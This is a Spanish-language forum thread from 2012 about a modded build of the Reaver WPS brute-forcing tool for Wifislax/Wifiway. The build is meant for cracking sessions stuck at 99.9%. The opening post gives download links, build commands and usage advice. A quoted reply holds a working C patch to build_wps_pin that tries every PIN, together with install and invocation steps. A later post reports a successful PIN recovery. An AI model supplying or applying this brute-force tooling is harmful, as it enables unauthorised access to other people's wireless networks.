Reaver-wifislax mod para problema 99%

Iniciado por ChimoC, 26 Noviembre 2012, 09:46 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

ChimoC

26 Noviembre 2012, 09:46 AM Ultima modificación: 28 Noviembre 2012, 12:10 PM por ChimoC
Buenas:

De el foro hermano de seguridadwireless (http://foro.seguridadwireless.net/live-wifislax/reaver-wifislax-mod-para-problema-99/msg259172/#msg259172)

Aclaraciones:

1-se ha modificado el fichero pins.c para que reaver compruebe todos los pins sin basarse en checksum.
2-este mod se utilizaria solo en caso de que reaver original se quede en 99,9% atascado
3-se requieren los 4 primeros digitos del pin (cuando reaver original se queda en 99 mirar los 4 primeros numeros del ultimo pin)
4-podeis lanzarlo sin poner los 4 primeros digitos ,PERO TARDARIA MESES
5-se ha modificado el instalador ,para que no elimine el reaver original en caso de estar instalado y para
  que el ejecutable se llame reaver-wifislax , ademas de usar un directorio de trabajo diferente ( /etc/reaver-wifislax)
6-se ha traducido en un 98% al español
7-se han coloreado las partes que mas interesa tener controladas,tales como el pin que testea en cada momento.
8-salvar sesion reaver ( de las distros) , no esta preparado para guardar en xzm las sesiones de este mod ,asi que ojo.
9-NO acepta testear pines completos, solo 4 primeros digitos.
10-si vuestro sistema esta instalado en hd no hay problema con lo de continuar sesiones.

_________________________________________________________________________________________

ESPERO QUE OS LEAIS LO ANTERIOR Y EVITAR ASI PREGUNTAS QUE SE RESPONDEN SOLAS
_________________________________________________________________________________________

ESTE MOD SE BASA EN LA MODIFICACION DE STEFANO RESPECTO AL FICHERO PINS.C
_________________________________________________________________________________________

  BETA 4

CHANGELOG:
Rectificado contador de porcentaje ( gracias shyraz )
Se pueden especificar pines completos como primer intento
Mejorado el sistema de keys , ordenando hacia arriba y prioridad 1 , las combinaciones conocidas


compilable para cualquier linux http://www.downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA4.tar.gz
modulo xzm wifiway/wifislax http://www.downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc4/reaver-1.4-wifislax-mod-BETA4.xzm






                                 BETA 3
                               
CAMBIOS: modificada toda la pantalla de muestra de datos de wash , ahora esta todo mas junto y ocupa la mitad de espacio que antes , añadidos colores a las zonas indicadoras de bssid essid etc.

Añadido lanzador , en la categoria wpa wps para lanzarlo comodamente sin usar consola.

Compilable para cualquier linux:
http://downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA3.tar.gz

Modulo xzm para wifiway 3.x o wifislax 4.x:
http://downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc3/reaver-1.4-wifislax-mod-BETA3.xzm

_____________________________________________________________________________________________
                   

                                                    BETA 1

Paquete compilable e instalable: http://www.downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA1.tar.gz
Modulo xzm para wifislax-4.3: http://www.downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc3/reaver-1.4-wifislax-mod-BETA1.xzm


Instalar el compilable

Código [Seleccionar]
./configure --prefix=/usr --sysconfdir=/etc
make
make install

EL EJECUTABLE SE LLAMA reaver-wifislax HAY QUE LLAMARLO DESDE CONSOLA DE MOMENTO NO LO TENGO INTEGRADO EN MENU


____________________________________________

                BETA  2     26/11/2012
_____________________________________________

Paquete compilable para cualquier linux : http://downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA2.tar.gz
Modulo xzm en principio valido para wifiway 3 y wifislax 4: http://downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc3/reaver-1.4-wifislax-mod-BETA2.xzm

P4nd3m0n1um

#1
26 Noviembre 2012, 11:11 AM
igual cambiando el dic se solucionaba.

beholdthe

#2
26 Noviembre 2012, 16:16 PM
ChimoC, sabes si esta solución al 99.99% la incluirán en una versión futura de Reaver??
Me intentare explicar mejor...  si en el siguiente Backtrack o el siguiente Wifislax que saquen, ya vendrá todo esto incluido?

ChimoC

#3
26 Noviembre 2012, 16:50 PM
Buenas:

@beholdthe: Creo recordar que un user llamado "Tystar" (también del foro hermano) ya habló con "Stefano" (http://code.google.com/p/reaver-wps/issues/detail?id=195#c41)

USUARIONUEVO ha hecho un par de módulos para usarlos en wifiway y wifislax. Si te da error de 99,99% lanzas el módulo con los 4 primeros números del último PIN donde se te haya quedado con el "BUG"

Saludos

ChimoC

P.D.: En BT noi tengo ni idea... solo te puedo comentar de nuestras distros

beholdthe

#4
26 Noviembre 2012, 21:41 PM
Cita de: ChimoC en 26 Noviembre 2012, 16:50 PM
Buenas:

@beholdthe: Creo recordar que un user llamado "Tystar" (también del foro hermano) ya habló con "Stefano" (http://code.google.com/p/reaver-wps/issues/detail?id=195#c41)

USUARIONUEVO ha hecho un par de módulos para usarlos en wifiway y wifislax. Si te da error de 99,99% lanzas el módulo con los 4 primeros números del último PIN donde se te haya quedado con el "BUG"

Saludos

ChimoC

P.D.: En BT noi tengo ni idea... solo te puedo comentar de nuestras distros
Lo probare, dado que tengo un router (ya te comente hace tiempo) que no hay quien pueda con el.
Mil gracias por la info y un saludo, espero que todo siga bien  :D :D

HalconEye

#5
26 Noviembre 2012, 23:34 PM
según el autor original del código(por cierto escrito en JAVA... ;-)),es posible evitar el tema del 99,99%,modificando unas líneas de código....en este enlace lo podéis seguir
http://code.google.com/p/reaver-wps/issues/detail?id=195#c41

Comment 41 by stefano....@gmail.com, Oct 22, 2012

I'm proud of you Tystar!
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transaction so it's not giving you continuously "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve these information using original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):

/* EXHAUSTIVE MOD. init */
/*
* in these lines trivial modifications are applied over the original code.
* these lines have to be considered for demonstration purpose only.
* WPA PSK retrieval is not granted.
* http://code.google.com/p/reaver-wps/issues/detail?id=195
*/

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);
     
                /* Generate a 7-digit pin */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));
           
                /* Append last digit */
                snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

                free(key);

      if(exhaustive_last_digit==0)
      {
         if(exhaustive_index==999)
         {
            cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
            /* Clean up and get out */
            globule_deinit();
            exit(EXIT_FAILURE);         
         }
         exhaustive_index++;
         exhaustive_last_digit=9;
      }else{
         exhaustive_last_digit--;
      }
        }

        return pin;
}

/* EXHAUSTIVE MOD. end */

-actual reaver have to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-modified reaver have to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the pin first 4 digits.
if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin).
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4).

to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with same commands as above.
Todo lo que digan que somos,
lo somos y aún peor.

punky14

#6
13 Marzo 2013, 04:36 AM
alguien me puede explicar como ponerlo en backtrack 5?

HalconEye

#7
8 Mayo 2013, 13:02 PM
He usado reavermod desde 0.
Ha tardado 48 horas en obtener los 4 primeros dígitos del pin...a 14 sg por pin
Los prueba TODOS dos veces
Completamente efectivo.una vez obtenidos los 4 primeros,continúa probándolos TODOS ignorando el cheksum como bien se comenta en el post.
Algo así..por ej,suponiendo que sean correctos los 4º,...33440010-33440011-33440012-3340013...etc,etc..
Con tiempo es casi imposible no obtener resultados con reavermod.
Excelente trabajo
Todo lo que digan que somos,
lo somos y aún peor.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario